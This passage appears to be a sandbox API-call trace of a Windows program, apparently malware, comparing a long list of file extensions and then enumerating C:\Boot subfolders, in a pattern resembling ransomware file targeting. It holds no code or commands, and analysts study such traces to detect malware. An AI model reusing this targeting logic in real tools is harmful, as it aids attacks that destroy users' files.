returned 3 [0032.675] lstrcmpiW (lpString1=".bd", lpString2="BCD") returned -1 [0032.675] lstrlenW (lpString=".bin") returned 4 [0032.675] lstrcmpiW (lpString1=".bin", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".bmp") returned 4 [0032.675] lstrcmpiW (lpString1=".bmp", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".bz2") returned 4 [0032.675] lstrcmpiW (lpString1=".bz2", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".c") returned 2 [0032.675] lstrcmpiW (lpString1=".c", lpString2="CD") returned -1 [0032.675] lstrlenW (lpString=".cdr") returned 4 [0032.675] lstrcmpiW (lpString1=".cdr", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".cer") returned 4 [0032.675] lstrcmpiW (lpString1=".cer", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".cf") returned 3 [0032.675] lstrcmpiW (lpString1=".cf", lpString2="BCD") returned -1 [0032.675] lstrlenW (lpString=".cfc") returned 4 [0032.675] lstrcmpiW (lpString1=".cfc", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".cfm") returned 4 [0032.675] lstrcmpiW (lpString1=".cfm", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".cfml") returned 5 [0032.675] lstrcmpiW (lpString1=".cfml", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".cfu") returned 4 [0032.675] lstrcmpiW (lpString1=".cfu", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".chm") returned 4 [0032.675] lstrcmpiW (lpString1=".chm", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".cin") returned 4 [0032.675] lstrcmpiW (lpString1=".cin", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".class") returned 6 [0032.675] lstrcmpiW (lpString1=".class", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".clx") returned 4 [0032.675] lstrcmpiW (lpString1=".clx", lpString2="") returned 1 [0032.675] lstrlenW (lpString=".config") returned 7 [0032.676] lstrcmpiW (lpString1=".config", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".cpp") returned 4 [0032.676] lstrcmpiW (lpString1=".cpp", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".cr2") returned 4 [0032.676] lstrcmpiW (lpString1=".cr2", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".crt") returned 4 [0032.676] lstrcmpiW (lpString1=".crt", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".crw") returned 4 [0032.676] lstrcmpiW (lpString1=".crw", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".cs") returned 3 [0032.676] lstrcmpiW (lpString1=".cs", lpString2="BCD") returned -1 [0032.676] lstrlenW (lpString=".css") returned 4 [0032.676] lstrcmpiW (lpString1=".css", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".csv") returned 4 [0032.676] lstrcmpiW (lpString1=".csv", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".cub") returned 4 [0032.676] lstrcmpiW (lpString1=".cub", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".dae") returned 4 [0032.676] lstrcmpiW (lpString1=".dae", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".dat") returned 4 [0032.676] lstrcmpiW (lpString1=".dat", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".db") returned 3 [0032.676] lstrcmpiW (lpString1=".db", lpString2="BCD") returned -1 [0032.676] lstrlenW (lpString=".dbf") returned 4 [0032.676] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".dbx") returned 4 [0032.676] lstrcmpiW (lpString1=".dbx", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".dc3") returned 4 [0032.676] lstrcmpiW (lpString1=".dc3", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".dcm") returned 4 [0032.676] lstrcmpiW (lpString1=".dcm", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".dcr") returned 4 [0032.676] lstrcmpiW (lpString1=".dcr", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".der") returned 4 [0032.676] lstrcmpiW (lpString1=".der", lpString2="") returned 1 [0032.676] lstrlenW (lpString=".dib") returned 4 [0032.676] lstrcmpiW (lpString1=".dib", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dic") returned 4 [0032.677] lstrcmpiW (lpString1=".dic", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dif") returned 4 [0032.677] lstrcmpiW (lpString1=".dif", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".divx") returned 5 [0032.677] lstrcmpiW (lpString1=".divx", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".djvu") returned 5 [0032.677] lstrcmpiW (lpString1=".djvu", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dng") returned 4 [0032.677] lstrcmpiW (lpString1=".dng", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".doc") returned 4 [0032.677] lstrcmpiW (lpString1=".doc", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".docm") returned 5 [0032.677] lstrcmpiW (lpString1=".docm", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".docx") returned 5 [0032.677] lstrcmpiW (lpString1=".docx", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dot") returned 4 [0032.677] lstrcmpiW (lpString1=".dot", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dotm") returned 5 [0032.677] lstrcmpiW (lpString1=".dotm", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dotx") returned 5 [0032.677] lstrcmpiW (lpString1=".dotx", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dpx") returned 4 [0032.677] lstrcmpiW (lpString1=".dpx", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dqy") returned 4 [0032.677] lstrcmpiW (lpString1=".dqy", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dsn") returned 4 [0032.677] lstrcmpiW (lpString1=".dsn", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dt") returned 3 [0032.677] lstrcmpiW (lpString1=".dt", lpString2="BCD") returned -1 [0032.677] lstrlenW (lpString=".dtd") returned 4 [0032.677] lstrcmpiW (lpString1=".dtd", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dwg") returned 4 [0032.677] lstrcmpiW (lpString1=".dwg", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dwt") returned 4 [0032.677] lstrcmpiW (lpString1=".dwt", lpString2="") returned 1 [0032.677] lstrlenW (lpString=".dx") returned 3 [0032.677] lstrcmpiW (lpString1=".dx", lpString2="BCD") returned -1 [0032.678] lstrlenW (lpString=".dxf") returned 4 [0032.678] lstrcmpiW (lpString1=".dxf", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".edml") returned 5 [0032.678] lstrcmpiW (lpString1=".edml", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".efd") returned 4 [0032.678] lstrcmpiW (lpString1=".efd", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".elf") returned 4 [0032.678] lstrcmpiW (lpString1=".elf", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".emf") returned 4 [0032.678] lstrcmpiW (lpString1=".emf", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".emz") returned 4 [0032.678] lstrcmpiW (lpString1=".emz", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".epf") returned 4 [0032.678] lstrcmpiW (lpString1=".epf", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".eps") returned 4 [0032.678] lstrcmpiW (lpString1=".eps", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".epsf") returned 5 [0032.678] lstrcmpiW (lpString1=".epsf", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".epsp") returned 5 [0032.678] lstrcmpiW (lpString1=".epsp", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".erf") returned 4 [0032.678] lstrcmpiW (lpString1=".erf", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".exr") returned 4 [0032.678] lstrcmpiW (lpString1=".exr", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".f4v") returned 4 [0032.678] lstrcmpiW (lpString1=".f4v", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".fido") returned 5 [0032.678] lstrcmpiW (lpString1=".fido", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".flm") returned 4 [0032.678] lstrcmpiW (lpString1=".flm", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".flv") returned 4 [0032.678] lstrcmpiW (lpString1=".flv", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".frm") returned 4 [0032.678] lstrcmpiW (lpString1=".frm", lpString2="") returned 1 [0032.678] lstrlenW (lpString=".fxg") returned 4 [0032.678] lstrcmpiW (lpString1=".fxg", lpString2="") returned 1 [0032.679] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.679] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6652b0 [0032.679] FindNextFileW (in: hFindFile=0x6652b0, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.679] FindNextFileW (in: hFindFile=0x6652b0, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.680] FindClose (in: hFindFile=0x6652b0 | out: hFindFile=0x6652b0) returned 1 [0032.680] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.680] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0032.680] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.680] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6652b0 [0032.687] FindNextFileW (in: hFindFile=0x6652b0, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.687] FindNextFileW (in: hFindFile=0x6652b0, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.687] FindClose (in: hFindFile=0x6652b0 | out: hFindFile=0x6652b0) returned 1 [0032.687] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.687] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0032.687] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.687] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6652b0 [0032.688] FindNextFileW (in: hFindFile=0x6652b0, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.688] FindNextFileW (in: hFindFile=0x6652b0, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.689] FindClose (in: hFindFile=0x6652b0 | out: hFindFile=0x6652b0) returned 1 [0032.689] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.689] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0032.689] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.689] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6652b0 [0032.689] FindNextFileW (in: hFindFile=0x6652b0, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.689] FindNextFileW (in: hFindFile=0x6652b0, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.689] FindClose (in: hFindFile=0x6652b0 | out: hFindFile=0x6652b0) returned 1 [0032.689] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.689] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0032.689] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.689] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662e28 [0032.690] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.690] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.690] FindClose (in: hFindFile=0x662e28 | out: hFindFile=0x662e28) returned 1 [0032.691] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.691] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0032.691] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.691] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662e28 [0032.691] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.691] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.692] FindClose (in: hFindFile=0x662e28 | out: hFindFile=0x662e28) returned 1 [0032.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.692] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0032.692] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.692] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662e28 [0032.692] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0032.692] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0032.692] FindClose (in: hFindFile=0x662e28 | out: hFindFile=0x662e28) returned 1 [0032.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39506e8 | out: hHeap=0x570000) returned 1 [0032.692] FindNextFileW (in: hFindFile=0x664268, lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0032.692] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39506e8 [0032.692] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x662e28 [0032.693] FindNextFileW (in: hFindFile=0x662e28, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, 